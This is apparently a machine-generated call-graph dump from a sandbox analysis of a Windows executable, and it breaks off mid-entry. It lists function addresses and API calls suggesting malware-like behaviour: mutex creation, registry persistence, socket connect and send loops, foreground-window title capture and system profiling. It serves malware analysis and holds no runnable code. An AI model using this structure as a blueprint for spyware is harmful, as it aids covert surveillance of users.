2b1b4a8 FindResourceA 47128->47532 47132 2b0f3ed _Yarn 47542 2b020b7 47132->47542 47135 2b01fe2 28 API calls 47136 2b0f413 47135->47136 47137 2b01fd8 11 API calls 47136->47137 47138 2b0f41c 47137->47138 47139 2b3bd51 ___std_exception_copy 21 API calls 47138->47139 47140 2b0f42d _Yarn 47139->47140 47548 2b06dd8 47140->47548 47142 2b0f460 47142->46827 47144 2b0210c 47143->47144 47145 2b023ce 11 API calls 47144->47145 47146 2b02126 47145->47146 47147 2b02569 28 API calls 47146->47147 47148 2b02134 47147->47148 47148->46830 47585 2b020df 47149->47585 47151 2b1be2e 47154 2b1bea0 47151->47154 47162 2b01fe2 28 API calls 47151->47162 47166 2b01fd8 11 API calls 47151->47166 47170 2b1be9e 47151->47170 47589 2b041a2 28 API calls 47151->47589 47590 2b1ce34 47151->47590 47152 2b01fd8 11 API calls 47153 2b1bed0 47152->47153 47155 2b01fd8 11 API calls 47153->47155 47601 2b041a2 28 API calls 47154->47601 47158 2b1bed8 47155->47158 47160 2b01fd8 11 API calls 47158->47160 47159 2b1beac 47161 2b01fe2 28 API calls 47159->47161 47163 2b0ea24 47160->47163 47164 2b1beb5 47161->47164 47162->47151 47171 2b0fb17 47163->47171 47165 2b01fd8 11 API calls 47164->47165 47167 2b1bebd 47165->47167 47166->47151 47168 2b1ce34 28 API calls 47167->47168 47168->47170 47170->47152 47172 2b0fb23 47171->47172 47174 2b0fb2a 47171->47174 47627 2b02163 11 API calls 47172->47627 47174->46835 47176 2b02163 47175->47176 47180 2b0219f 47176->47180 47628 2b02730 11 API calls 47176->47628 47178 2b02184 47629 2b02712 11 API calls std::_Deallocate 47178->47629 47180->46837 47182 2b01e6d 47181->47182 47183 2b01e75 47182->47183 47630 2b02158 22 API calls 47182->47630 47183->46843 47187 2b020df 11 API calls 47186->47187 47188 2b0532a 47187->47188 47631 2b032a0 47188->47631 47190 2b05346 47190->46850 47636 2b051ef 47191->47636 47193 2b06391 47640 2b02055 47193->47640 47196 2b01fe2 47197 2b01ff1 47196->47197 47204 2b02039 47196->47204 47198 2b023ce 11 API calls 47197->47198 47199 2b01ffa 47198->47199 47200 2b0203c 47199->47200 47201 2b02015 47199->47201 47202 2b0267a 11 API calls 47200->47202 47674 2b03098 28 API calls 47201->47674 47202->47204 47205 2b01fd8 47204->47205 47206 2b023ce 11 API calls 47205->47206 47207 2b01fe1 47206->47207 47207->46862 47209 2b01fd2 47208->47209 47210 2b01fc9 47208->47210 47209->46868 47675 2b025e0 28 API calls 47210->47675 47676 2b01fab 47212->47676 47214 2b0d073 CreateMutexA GetLastError 47214->46884 47677 2b1bfb7 47215->47677 47220 2b01fe2 28 API calls 47221 2b1b2ff 47220->47221 47222 2b01fd8 11 API calls 47221->47222 47223 2b1b307 47222->47223 47224 2b135a6 31 API calls 47223->47224 47226 2b1b35d 47223->47226 47225 2b1b330 47224->47225 47227 2b1b33b StrToIntA 47225->47227 47226->46891 47228 2b1b352 47227->47228 47229 2b1b349 47227->47229 47231 2b01fd8 11 API calls 47228->47231 47685 2b1cf69 22 API calls 47229->47685 47231->47226 47233 2b0772a 47232->47233 47234 2b13549 3 API calls 47233->47234 47235 2b07731 47234->47235 47235->46901 47235->46902 47237 2b1bc72 47236->47237 47686 2b0b904 47237->47686 47239 2b1bc7a 47239->46919 47241 2b01f22 47240->47241 47242 2b01f6a 47240->47242 47243 2b02252 11 API calls 47241->47243 47249 2b01f09 47242->47249 47244 2b01f2b 47243->47244 47245 2b01f6d 47244->47245 47246 2b01f46 47244->47246 47719 2b02336 47245->47719 47718 2b0305c 28 API calls 47246->47718 47250 2b02252 11 API calls 47249->47250 47251 2b01f12 47250->47251 47251->46930 47253 2b13965 47252->47253 47254 2b06dd8 28 API calls 47253->47254 47255 2b1397a 47254->47255 47256 2b020f6 28 API calls 47255->47256 47257 2b1398a 47256->47257 47258 2b1376f 14 API calls 47257->47258 47259 2b13994 47258->47259 47260 2b01fd8 11 API calls 47259->47260 47261 2b139a1 47260->47261 47261->46980 47263 2b0209b 47262->47263 47264 2b023ce 11 API calls 47263->47264 47265 2b020a6 47264->47265 47723 2b024ed 47265->47723 47269 2b13788 47268->47269 47270 2b137bf 47268->47270 47273 2b1379a RegSetValueExA RegCloseKey 47269->47273 47271 2b01fd8 11 API calls 47270->47271 47272 2b0ef9e 47271->47272 47272->46981 47273->47270 47275 2b3bac5 _swprintf 47274->47275 47727 2b3ae03 47275->47727 47277 2b0efb7 47277->46988 47277->46989 47279 2b1b5a0 47278->47279 47280 2b1b505 GetLocalTime 47278->47280 47282 2b01fd8 11 API calls 47279->47282 47281 2b0531e 28 API calls 47280->47281 47283 2b1b547 47281->47283 47284 2b1b5a8 47282->47284 47285 2b06383 28 API calls 47283->47285 47286 2b01fd8 11 API calls 47284->47286 47287 2b1b553 47285->47287 47288 2b0f00d 47286->47288 47755 2b02f10 47287->47755 47288->47005 47291 2b06383 28 API calls 47292 2b1b56b 47291->47292 47760 2b07200 76 API calls 47292->47760 47294 2b1b579 47295 2b01fd8 11 API calls 47294->47295 47296 2b1b585 47295->47296 47297 2b01fd8 11 API calls 47296->47297 47298 2b1b58e 47297->47298 47299 2b01fd8 11 API calls 47298->47299 47300 2b1b597 47299->47300 47301 2b01fd8 11 API calls 47300->47301 47301->47279 47303 2b09e02 _wcslen 47302->47303 47304 2b09e24 47303->47304 47305 2b09e0d 47303->47305 47307 2b0da34 31 API calls 47304->47307 47306 2b0da34 31 API calls 47305->47306 47308 2b09e15 47306->47308 47309 2b09e2c 47307->47309 47310 2b01f13 28 API calls 47308->47310 47311 2b01f13 28 API calls 47309->47311 47326 2b09e1f 47310->47326 47312 2b09e3a 47311->47312 47313 2b01f09 11 API calls 47312->47313 47315 2b09e42 47313->47315 47314 2b01f09 11 API calls 47317 2b09e79 47314->47317 47779 2b0915b 28 API calls 47315->47779 47764 2b0a109 47317->47764 47318 2b09e54 47780 2b03014 47318->47780 47323 2b01f13 28 API calls 47324 2b09e69 47323->47324 47325 2b01f09 11 API calls 47324->47325 47325->47326 47326->47314 47832 2b0417e 47327->47832 47332 2b03014 28 API calls 47333 2b1b672 47332->47333 47334 2b01f09 11 API calls 47333->47334 47335 2b1b67b 47334->47335 47336 2b01f09 11 API calls 47335->47336 47337 2b0f223 47336->47337 47337->47058 47339 2b13520 RegQueryValueExA RegCloseKey 47338->47339 47340 2b0f2e4 47338->47340 47339->47340 47340->46931 47340->47086 47342 2b0f392 47341->47342 47343 2b13a3f RegDeleteValueW 47341->47343 47342->46925 47343->47342 47345 2b0dd5b 47344->47345 47346 2b134ff 3 API calls 47345->47346 47347 2b0dd62 47346->47347 47348 2b0dd81 47347->47348 47924 2b01707 47347->47924 47352 2b14f2a 47348->47352 47350 2b0dd6f 47927 2b13877 RegCreateKeyA 47350->47927 47353 2b020df 11 API calls 47352->47353 47354 2b14f3e 47353->47354 47941 2b1b8b3 47354->47941 47357 2b020df 11 API calls 47358 2b14f54 47357->47358 47359 2b01e65 22 API calls 47358->47359 47360 2b14f62 47359->47360 47361 2b3baac 39 API calls 47360->47361 47362 2b14f6f 47361->47362 47363 2b14f81 47362->47363 47364 2b14f74 Sleep 47362->47364 47365 2b02093 28 API calls 47363->47365 47364->47363 47366 2b14f90 47365->47366 47367 2b01e65 22 API calls 47366->47367 47368 2b14f99 47367->47368 47369 2b020f6 28 API calls 47368->47369 47370 2b14fa4 47369->47370 47371 2b1be1b 28 API calls 47370->47371 47372 2b14fac 47371->47372 47945 2b0489e WSAStartup 47372->47945 47374 2b14fb6 47375 2b01e65 22 API calls 47374->47375 47376 2b14fbf 47375->47376 47377 2b01e65 22 API calls 47376->47377 47401 2b1503e 47376->47401 47378 2b14fd8 47377->47378 47380 2b01e65 22 API calls 47378->47380 47379 2b020f6 28 API calls 47379->47401 47381 2b14fe9 47380->47381 47383 2b01e65 22 API calls 47381->47383 47382 2b1be1b 28 API calls 47382->47401 47384 2b14ffa 47383->47384 47387 2b01e65 22 API calls 47384->47387 47385 2b01e65 22 API calls 47385->47401 47386 2b06c1e 28 API calls 47386->47401 47388 2b1500b 47387->47388 47390 2b01e65 22 API calls 47388->47390 47389 2b01fe2 28 API calls 47389->47401 47391 2b1501c 47390->47391 47392 2b01e65 22 API calls 47391->47392 47393 2b1502e 47392->47393 48119 2b0473d 88 API calls 47393->48119 47396 2b1518c WSAGetLastError 48120 2b1cae1 30 API calls 47396->48120 47401->47379 47401->47382 47401->47385 47401->47386 47401->47389 47401->47396 47403 2b1b4ef 79 API calls 47401->47403 47405 2b0531e 28 API calls 47401->47405 47406 2b01e8d 11 API calls 47401->47406 47407 2b3baac 39 API calls 47401->47407 47409 2b02f10 28 API calls 47401->47409 47410 2b02093 28 API calls 47401->47410 47413 2b0905c 28 API calls 47401->47413 47415 2b136f8 3 API calls 47401->47415 47416 2b135a6 31 API calls 47401->47416 47417 2b0417e 28 API calls 47401->47417 47420 2b01e65 22 API calls 47401->47420 47424 2b1bb8e 28 API calls 47401->47424 47427 2b1bd1e 28 API calls 47401->47427 47429 2b02ea1 28 API calls 47401->47429 47430 2b06383 28 API calls 47401->47430 47432 2b01fd8 11 API calls 47401->47432 47433 2b01f09 11 API calls 47401->47433 47435 2b15a33 47401->47435 47437 2b15a71 CreateThread 47401->47437 47946 2b14ee9 47401->47946 47951 2b0482d 47401->47951 47958 2b04f51 47401->47958 47973 2b048c8 connect 47401->47973 48033 2b1b7e0 47401->48033 48036 2b145bd 47401->48036 48039 2b41e81 47401->48039 48043 2b0dd89 47401->48043 48049 2b1bc42 47401->48049 48057 2b1bae6 47401->48057 48059 2b1ba96 47401->48059 48064 2b0f8d1 GetLocaleInfoA 47401->48064 48067 2b02f31 47401->48067 48072 2b04aa1 47401->48072 48087 2b04c10 47401->48087 48106 2b04e26 WaitForSingleObject 47401->48106 48121 2b052fd 28 API calls 47401->48121 47403->47401 47405->47401 47406->47401 47408 2b15acf Sleep 47407->47408 47408->47401 47409->47401 47410->47401 47413->47401 47415->47401 47416->47401 47417->47401 47421 2b15439 GetTickCount 47420->47421 48052 2b1bb8e 47421->48052 47424->47401 47427->47401 47429->47401 47430->47401 47432->47401 47433->47401 48122 2b0b051 84 API calls 47435->48122 47437->47401 48209 2b1ad17 104 API calls 47437->48209 47438->46842 47439->46851 47440->46855 47443 2b020df 11 API calls 47442->47443 47444 2b06c2a 47443->47444 47445 2b032a0 28 API calls 47444->47445 47446 2b06c47 47445->47446 47446->46876 47448 2b0eba4 47447->47448 47449 2b13573 RegQueryValueExA RegCloseKey 47447->47449 47448->46873 47448->46890 47449->47448 47450->46880 47451->46909 47452->46902 47453->46894 47454->46907 48210 2b01f86 47455->48210 47458 2b0da70 48214 2b1b5b4 29 API calls 47458->48214 47459 2b0daa5 47462 2b1bfb7 GetCurrentProcess 47459->47462 47460 2b0db99 GetLongPathNameW 47465 2b0417e 28 API calls 47460->47465 47461 2b0da66 47461->47460 47466 2b0daaa 47462->47466 47464 2b0da79 47467 2b01f13 28 API calls 47464->47467 47468 2b0dbae 47465->47468 47469 2b0db00 47466->47469 47470 2b0daae 47466->47470 47508 2b0da83 47467->47508 47471 2b0417e 28 API calls 47468->47471 47472 2b0417e 28 API calls 47469->47472 47473 2b0417e 28 API calls 47470->47473 47474 2b0dbbd 47471->47474 47475 2b0db0e 47472->47475 47476 2b0dabc 47473->47476 48217 2b0ddd1 28 API calls 47474->48217 47482 2b0417e 28 API calls 47475->47482 47480 2b0417e 28 API calls 47476->47480 47477 2b01f09 11 API calls 47477->47461 47479 2b0dbd0 48218 2b02fa5 28 API calls 47479->48218 47484 2b0dad2 47480->47484 47483 2b0db24 47482->47483 48216 2b02fa5 28 API calls 47483->48216 48215 2b02fa5 28 API calls 47484->48215 47485 2b0dbdb 48219 2b02fa5 28 API calls 47485->48219 47489 2b0dbe5 47492 2b01f09 11 API calls 47489->47492 47490 2b0db2f 47493 2b01f13 28 API calls 47490->47493 47491 2b0dadd 47494 2b01f13 28 API calls 47491->47494 47495 2b0dbef 47492->47495 47496 2b0db3a 47493->47496 47497 2b0dae8 47494->47497 47498 2b01f09 11 API calls 47495->47498 47499 2b01f09 11 API calls 47496->47499 47500 2b01f09 11 API calls 47497->47500 47501 2b0dbf8 47498->47501 47502 2b0db43 47499->47502 47503 2b0daf1 47500->47503 47504 2b01f09 11 API calls 47501->47504 47505 2b01f09 11 API calls 47502->47505 47506 2b01f09 11 API calls 47503->47506 47507 2b0dc01 47504->47507 47505->47508 47506->47508 47509 2b01f09 11 API calls 47507->47509 47508->47477 47510 2b0dc0a 47509->47510 47511 2b01f09 11 API calls 47510->47511 47512 2b0dc13 47511->47512 47512->46967 47513->46978 47514->47001 47516 2b1371e RegQueryValueExA RegCloseKey 47515->47516 47517 2b13742 47515->47517 47516->47517 47517->46960 47518->46995 47522 2b344ef 47519->47522 47520 2b3bd51 ___std_exception_copy 21 API calls 47520->47522 47521 2b0f0d1 47521->47031 47522->47520 47522->47521 48220 2b42f80 7 API calls 2 library calls 47522->48220 48221 2b34c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47522->48221 48222 2b3526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47522->48222 47526->47062 47527->47051 47529->47095 47530->46900 47533 2b1b4c5 LoadResource LockResource SizeofResource 47532->47533 47534 2b0f3de 47532->47534 47533->47534 47535 2b3bd51 47534->47535 47540 2b46137 ___crtLCMapStringA 47535->47540 47536 2b46175 47552 2b405dd 20 API calls _Atexit 47536->47552 47538 2b46160 RtlAllocateHeap 47539 2b46173 47538->47539 47538->47540 47539->47132 47540->47536 47540->47538 47551 2b42f80 7 API calls 2 library calls 47540->47551 47543 2b020bf 47542->47543 47553 2b023ce 47543->47553 47545 2b020ca 47557 2b0250a 47545->47557 47547 2b020d9 47547->47135 47549 2b020b7 28 API calls 47548->47549 47550 2b06dec 47549->47550 47550->47142 47551->47540 47552->47539 47554 2b02428 47553->47554 47555 2b023d8 47553->47555 47554->47545 47555->47554 47564 2b027a7 11 API calls std::_Deallocate 47555->47564 47558 2b0251a 47557->47558 47559 2b02535 47558->47559 47561 2b02520 47558->47561 47575 2b028e8 28 API calls 47559->47575 47565 2b02569 47561->47565 47563 2b02533 47563->47547 47564->47554 47576 2b02888 47565->47576 47567 2b0257d 47568 2b02592 47567->47568 47569 2b025a7 47567->47569 47581 2b02a34 22 API calls 47568->47581 47583 2b028e8 28 API calls 47569->47583 47572 2b0259b 47582 2b029da 22 API calls 47572->47582 47574 2b025a5 47574->47563 47575->47563 47577 2b02890 47576->47577 47578 2b02898 47577->47578 47584 2b02ca3 22 API calls 47577->47584 47578->47567 47581->47572 47582->47574 47583->47574 47586 2b020e7 47585->47586 47587 2b023ce 11 API calls 47586->47587 47588 2b020f2 47587->47588 47588->47151 47589->47151 47591 2b1ce41 47590->47591 47592 2b1ce51 47591->47592 47593 2b1cea0 47591->47593 47597 2b1ce89 47592->47597 47602 2b1cfe0 47592->47602 47594 2b1ceba 47593->47594 47595 2b1cfe0 28 API calls 47593->47595 47611 2b1d146 28 API calls 47594->47611 47595->47594 47610 2b1d146 28 API calls 47597->47610 47598 2b1ce9c 47598->47151 47601->47159 47604 2b1cfe8 47602->47604 47603 2b1d01a 47603->47597 47604->47603 47605 2b1d01e 47604->47605 47608 2b1d002 47604->47608 47622 2b02725 22 API calls 47605->47622 47612 2b1d051 47608->47612 47610->47598 47611->47598 47613 2b1d05b __EH_prolog 47612->47613 47623 2b02717 22 API calls 47613->47623 47615 2b1d06e 47624 2b1d15d 11 API calls 47615->47624 47617 2b1d094 47618 2b1d0cc 47617->47618 47625 2b02730 11 API calls 47617->47625 47618->47603 47620 2b1d0b3 47626 2b02712 11 API calls std::_Deallocate 47620->47626 47623->47615 47624->47617 47625->47620 47626->47618 47627->47174 47628->47178 47629->47180 47632 2b032aa 47631->47632 47633 2b032c9 47632->47633 47635 2b028e8 28 API calls 47632->47635 47633->47190 47635->47633 47637 2b051fb 47636->47637 47646 2b05274 47637->47646 47639 2b05208 47639->47193 47641 2b02061 47640->47641 47642 2b023ce 11 API calls 47641->47642 47643 2b0207b 47642->47643 47670 2b0267a 47643->47670 47647 2b05282 47646->47647 47648 2b05288 47647->47648 47649 2b0529e 47647->47649 47657 2b025f0 47648->47657 47651 2b052f5 47649->47651 47652 2b052b6 47649->47652 47667 2b028a4 22 API calls 47651->47667 47656 2b0529c 47652->47656 47666 2b028e8 28 API calls 47652->47666 47656->47639 47658 2b02888 22 API calls 47657->47658 47659 2b02602 47658->47659 47660 2b02672 47659->47660 47661 2b02629 47659->47661 47669 2b028a4 22 API calls 47660->47669 47665 2b0263b 47661->47665 47668 2b028e8 28 API calls 47661->47668 47665->47656 47666->47656 47668->47665 47671 2b0268b 47670->47671 47672 2b023ce 11 API calls 47671->47672 47673 2b0208d 47672->47673 47673->47196 47674->47204 47675->47209 47678 2b1bfc4 GetCurrentProcess 47677->47678 47679 2b1b2d1 47677->47679 47678->47679 47680 2b135a6 RegOpenKeyExA 47679->47680 47681 2b135d4 RegQueryValueExA RegCloseKey 47680->47681 47682 2b135fe 47680->47682 47681->47682 47683 2b02093 28 API calls 47682->47683 47684 2b13613 47683->47684 47684->47220 47685->47228 47687 2b0b90c 47686->47687 47692 2b02252 47687->47692 47689 2b0b917 47696 2b0b92c 47689->47696 47691 2b0b926 47691->47239 47693 2b022ac 47692->47693 47694 2b0225c 47692->47694 47693->47689 47694->47693 47703 2b02779 11 API calls std::_Deallocate 47694->47703 47697 2b0b966 47696->47697 47698 2b0b938 47696->47698 47715 2b028a4 22 API calls 47697->47715 47704 2b027e6 47698->47704 47702 2b0b942 47702->47691 47703->47693 47705 2b027ef 47704->47705 47706 2b02851 47705->47706 47707 2b027f9 47705->47707 47717 2b028a4 22 API calls 47706->47717 47710 2b02802 47707->47710 47712 2b02815 47707->47712 47716 2b02aea 28 API calls __EH_prolog 47710->47716 47713 2b02813 47712->47713 47714 2b02252 11 API calls 47712->47714 47713->47702 47714->47713 47716->47713 47718->47242 47720 2b02347 47719->47720 47721 2b02252 11 API calls 47720->47721 47722 2b023c7 47721->47722 47722->47242 47724 2b024f9 47723->47724 47725 2b0250a 28 API calls 47724->47725 47726 2b020b1 47725->47726 47726->46971 47743 2b3ba0a 47727->47743 47729 2b3ae50 47749 2b3a7b7 35 API calls 3 library calls 47729->47749 47731 2b3ae15 47731->47729 47732 2b3ae2a 47731->47732 47742 2b3ae2f _Atexit 47731->47742 47748 2b405dd 20 API calls _Atexit 47732->47748 47735 2b3ae5c 47736 2b3ae8b 47735->47736 47750 2b3ba4f 39 API calls __Tolower 47735->47750 47739 2b3aef7 47736->47739 47751 2b3b9b6 20 API calls 2 library calls 47736->47751 47752 2b3b9b6 20 API calls 2 library calls 47739->47752 47740 2b3afbe _swprintf 47740->47742 47753 2b405dd 20 API calls _Atexit 47740->47753 47742->47277 47744 2b3ba22 47743->47744 47745 2b3ba0f 47743->47745 47744->47731 47754 2b405dd 20 API calls _Atexit 47745->47754 47747 2b3ba14 _Atexit 47747->47731 47748->47742 47749->47735 47750->47735 47751->47739 47752->47740 47753->47742 47754->47747 47761 2b01fb0 47755->47761 47757 2b02f1e 47758 2b02055 11 API calls 47757->47758 47759 2b02f2d 47758->47759 47759->47291 47760->47294 47762 2b025f0 28 API calls 47761->47762 47763 2b01fbd 47762->47763 47763->47757 47765 2b0a127 47764->47765 47766 2b13549 3 API calls 47765->47766 47767 2b0a12e 47766->47767 47768 2b0a142 47767->47768 47769 2b0a15c 47767->47769 47771 2b09e9b 47768->47771 47772 2b0a147 47768->47772 47770 2b0905c 28 API calls 47769->47770 47773 2b0a16a 47770->47773 47771->47024 47785 2b0905c 47772->47785 47792 2b0a179 85 API calls 47773->47792 47778 2b0a15a 47778->47771 47779->47318 47809 2b03222 47780->47809 47782 2b03022 47813 2b03262 47782->47813 47786 2b09072 47785->47786 47787 2b02252 11 API calls 47786->47787 47788 2b0908c 47787->47788 47793 2b04267 47788->47793 47790 2b0909a 47791 2b0a22d 29 API calls 47790->47791 47791->47778 47805 2b0a273 162 API calls 47791->47805 47792->47771 47806 2b0a267 85 API calls 47792->47806 47807 2b0a289 48 API calls 47792->47807 47808 2b0a27d 127 API calls 47792->47808 47794 2b02888 22 API calls 47793->47794 47795 2b0427b 47794->47795 47796 2b04290 47795->47796 47797 2b042a5 47795->47797 47803 2b042df 22 API calls 47796->47803 47798 2b027e6 28 API calls 47797->47798 47802 2b042a3 47798->47802 47800 2b04299 47804 2b02c48 22 API calls 47800->47804 47802->47790 47803->47800 47804->47802 47810 2b0322e 47809->47810 47819 2b03618 47810->47819 47812 2b0323b 47812->47782 47814 2b0326e 47813->47814 47815 2b02252 11 API calls 47814->47815 47816 2b03288 47815->47816 47817 2b02336 11 API calls 47816->47817 47818 2b03031 47817->47818 47818->47323 47820 2b03626 47819->47820 47821 2b03644 47820->47821 47822 2b0362c 47820->47822 47824 2b0365c 47821->47824 47825 2b0369e 47821->47825 47830 2b036a6 28 API calls 47822->47830 47828 2b027e6 28 API calls 47824->47828 47829 2b03642 47824->47829 47831 2b028a4 22 API calls 47825->47831 47828->47829 47829->47812 47830->47829 47833 2b04186 47832->47833 47834 2b02252 11 API calls 47833->47834 47835 2b04191 47834->47835 47843 2b041bc 47835->47843 47838 2b042fc 47854 2b04353 47838->47854 47840 2b0430a 47841 2b03262 11 API calls 47840->47841 47842 2b04319 47841->47842 47842->47332 47844 2b041c8 47843->47844 47847 2b041d9 47844->47847 47846 2b0419c 47846->47838 47848 2b041e9 47847->47848 47849 2b04206 47848->47849 47850 2b041ef 47848->47850 47851 2b027e6 28 API calls 47849->47851 47852 2b04267 28 API calls 47850->47852 47853 2b04204 47851->47853 47852->47853 47853->47846 47855 2b0435f 47854->47855 47858 2b04371 47855->47858 47857 2b0436d 47857->47840 47859 2b0437f 47858->47859 47860 2b04385 47859->47860 47861 2b0439e 47859->47861 47922 2b034e6 28 API calls 47860->47922 47862 2b02888 22 API calls 47861->47862 47863 2b043a6 47862->47863 47865 2b04419 47863->47865 47866 2b043bf 47863->47866 47923 2b028a4 22 API calls 47865->47923 47868 2b027e6 28 API calls 47866->47868 47878 2b0439c 47866->47878 47868->47878 47878->47857 47922->47878 47930 2b3aa9a 47924->47930 47928 2b138b9 47927->47928 47929 2b1388f RegSetValueExA RegCloseKey 47927->47929 47928->47348 47929->47928 47933 2b3aa1b 47930->47933 47932 2b0170d 47932->47350 47934 2b3aa2a 47933->47934 47935 2b3aa3e 47933->47935 47939 2b405dd 20 API calls _Atexit 47934->47939 47938 2b3aa2f __alldvrm _Atexit 47935->47938 47940 2b48957 11 API calls 2 library calls 47935->47940 47938->47932 47939->47938 47940->47938 47944 2b1b8f9 _Yarn ___scrt_fastfail 47941->47944 47942 2b02093 28 API calls 47943 2b14f49 47942->47943 47943->47357 47944->47942 47945->47374 47947 2b14f02 getaddrinfo WSASetLastError 47946->47947 47948 2b14ef8 47946->47948 47947->47401 48123 2b14d86 29 API calls ___std_exception_copy 47948->48123 47950 2b14efd 47950->47947 47952 2b04846 socket 47951->47952 47953 2b04839 47951->47953 47955 2b04860 CreateEventW 47952->47955 47956 2b04842 47952->47956 48124 2b0489e WSAStartup 47953->48124 47955->47401 47956->47401 47957 2b0483e 47957->47952 47957->47956 47959 2b04f65 47958->47959 47960 2b04fea 47958->47960 47961 2b04f6e 47959->47961 47962 2b04fc0 CreateEventA CreateThread 47959->47962 47963 2b04f7d GetLocalTime 47959->47963 47960->47401 47961->47962 47962->47960 48126 2b05150 47962->48126 47964 2b1bb8e 28 API calls 47963->47964 47965 2b04f91 47964->47965 48125 2b052fd 28 API calls 47965->48125 47974 2b04a1b 47973->47974 47975 2b048ee 47973->47975 47976 2b0497e 47974->47976 47977 2b04a21 WSAGetLastError 47974->47977 47975->47976 47979 2b0531e 28 API calls 47975->47979 47997 2b04923 47975->47997 47976->47401 47977->47976 47978 2b04a31 47977->47978 47980 2b04a36 47978->47980 47988 2b04932 47978->47988 47982 2b0490f 47979->47982 48135 2b1cae1 30 API calls 47980->48135 47986 2b02093 28 API calls 47982->47986 47984 2b0492b 47984->47988 47992 2b04941 47984->47992 47985 2b02093 28 API calls 47989 2b04a80 47985->47989 47990 2b0491e 47986->47990 47987 2b04a40 48136 2b052fd 28 API calls 47987->48136 47988->47985 47993 2b02093 28 API calls 47989->47993 47994 2b1b4ef 79 API calls 47990->47994 47999 2b04950 47992->47999 48000 2b04987 47992->48000 47996 2b04a8f 47993->47996 47994->47997 48002 2b1b4ef 79 API calls 47996->48002 48130 2b20c60 27 API calls 47997->48130 48001 2b02093 28 API calls 47999->48001 48132 2b21a40 53 API calls 48000->48132 48005 2b0495f 48001->48005 48002->47976 48008 2b02093 28 API calls 48005->48008 48007 2b0498f 48010 2b049c4 48007->48010 48011 2b04994 48007->48011 48012 2b0496e 48008->48012 48134 2b20e06 28 API calls 48010->48134 48015 2b02093 28 API calls 48011->48015 48016 2b1b4ef 79 API calls 48012->48016 48018 2b049a3 48015->48018 48019 2b04973 48016->48019 48017 2b049cc 48020 2b049f9 CreateEventW CreateEventW 48017->48020 48023 2b02093 28 API calls 48017->48023 48021 2b02093 28 API calls 48018->48021 48131 2b1e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48019->48131 48020->47976 48022 2b049b2 48021->48022 48024 2b1b4ef 79 API calls 48022->48024 48026 2b049e2 48023->48026 48027 2b049b7 48024->48027 48028 2b02093 28 API calls 48026->48028 48133 2b210b2 51 API calls 48027->48133 48030 2b049f1 48028->48030 48031 2b1b4ef 79 API calls 48030->48031 48032 2b049f6 48031->48032 48032->48020 48137 2b1b7b6 GlobalMemoryStatusEx 48033->48137 48035 2b1b7f5 48035->47401 48138 2b14580 48036->48138 48040 2b41e8d 48039->48040 48168 2b41c7d 48040->48168 48042 2b41eae 48042->47401 48044 2b0dda5 48043->48044 48045 2b134ff 3 API calls 48044->48045 48047 2b0ddac 48045->48047 48046 2b0ddc4 48046->47401 48047->48046 48048 2b13549 3 API calls 48047->48048 48048->48046 48050 2b020b7 28 API calls 48049->48050 48051 2b1bc57 48050->48051 48051->47401 48053 2b41e81 20 API calls 48052->48053 48054 2b1bbb2 48053->48054 48055 2b02093 28 API calls 48054->48055 48056 2b1bbc0 48055->48056 48056->47401 48058 2b1bafc GetTickCount 48057->48058 48058->47401 48060 2b36e90 ___scrt_fastfail 48059->48060 48061 2b1bab5 GetForegroundWindow GetWindowTextW 48060->48061 48062 2b0417e 28 API calls 48061->48062 48063 2b1badf 48062->48063 48063->47401 48065 2b02093 28 API calls 48064->48065 48066 2b0f8f6 48065->48066 48066->47401 48068 2b020df 11 API calls 48067->48068 48069 2b02f3d 48068->48069 48070 2b032a0 28 API calls 48069->48070 48071 2b02f59 48070->48071 48071->47401 48073 2b04ab4 48072->48073 48173 2b0520c 48073->48173 48075 2b04ac9 _Yarn 48076 2b04b40 WaitForSingleObject 48075->48076 48077 2b04b20 48075->48077 48079 2b04b56 48076->48079 48078 2b04b32 send 48077->48078 48080 2b04b7b 48078->48080 48179 2b2103a 53 API calls 48079->48179 48083 2b01fd8 11 API calls 48080->48083 48082 2b04b69 SetEvent 48082->48080 48084 2b04b83 48083->48084 48085 2b01fd8 11 API calls 48084->48085 48086 2b04b8b 48085->48086 48086->47401 48088 2b020df 11 API calls 48087->48088 48089 2b04c27 48088->48089 48090 2b020df 11 API calls 48089->48090 48097 2b04c30 48090->48097 48091 2b3bd51 ___std_exception_copy 21 API calls 48091->48097 48093 2b020b7 28 API calls 48093->48097 48094 2b04ca1 48096 2b04e26 98 API calls 48094->48096 48095 2b01fe2 28 API calls 48095->48097 48098 2b04ca8 48096->48098 48097->48091 48097->48093 48097->48094 48097->48095 48099 2b01fd8 11 API calls 48097->48099 48103 2b04c84 48097->48103 48198 2b04b96 48097->48198 48100 2b01fd8 11 API calls 48098->48100 48099->48097 48101 2b04cb1 48100->48101 48102 2b01fd8 11 API calls 48101->48102 48104 2b04cba 48102->48104 48204 2b04cc3 32 API calls 48103->48204 48104->47401 48107 2b04e40 SetEvent CloseHandle 48106->48107 48108 2b04e57 closesocket 48106->48108 48109 2b04ed8 48107->48109 48110 2b04e64 48108->48110 48109->47401 48111 2b04e7a 48110->48111 48206 2b050e4 83 API calls 48110->48206 48113 2b04e8c WaitForSingleObject 48111->48113 48114 2b04ece SetEvent CloseHandle 48111->48114 48207 2b1e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48113->48207 48114->48109 48116 2b04e9b SetEvent WaitForSingleObject 48208 2b1e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48116->48208 48118 2b04eb3 SetEvent CloseHandle CloseHandle 48118->48114 48119->47401 48120->47401 48122->47401 48123->47950 48124->47957 48129 2b0515c 101 API calls 48126->48129 48128 2b05159 48129->48128 48130->47984 48131->47976 48132->48007 48133->48019 48134->48017 48135->47987 48137->48035 48141 2b14553 48138->48141 48142 2b14568 ___scrt_initialize_default_local_stdio_options 48141->48142 48145 2b3f79d 48142->48145 48148 2b3c4f0 48145->48148 48149 2b3c530 48148->48149 48150 2b3c518 48148->48150 48149->48150 48151 2b3c538 48149->48151 48163 2b405dd 20 API calls _Atexit 48150->48163 48164 2b3a7b7 35 API calls 3 library calls 48151->48164 48154 2b3c548 48165 2b3cc76 20 API calls 2 library calls 48154->48165 48155 2b3c51d _Atexit 48156 2b34fcb _ValidateLocalCookies 5 API calls 48155->48156 48158 2b14576 48156->48158 48158->47401 48159 2b3c5c0 48166 2b3d2e4 50 API calls 3 library calls 48159->48166 48162 2b3c5cb 48167 2b3cce0 20 API calls _free 48162->48167 48163->48155 48164->48154 48165->48159 48166->48162 48167->48155 48169 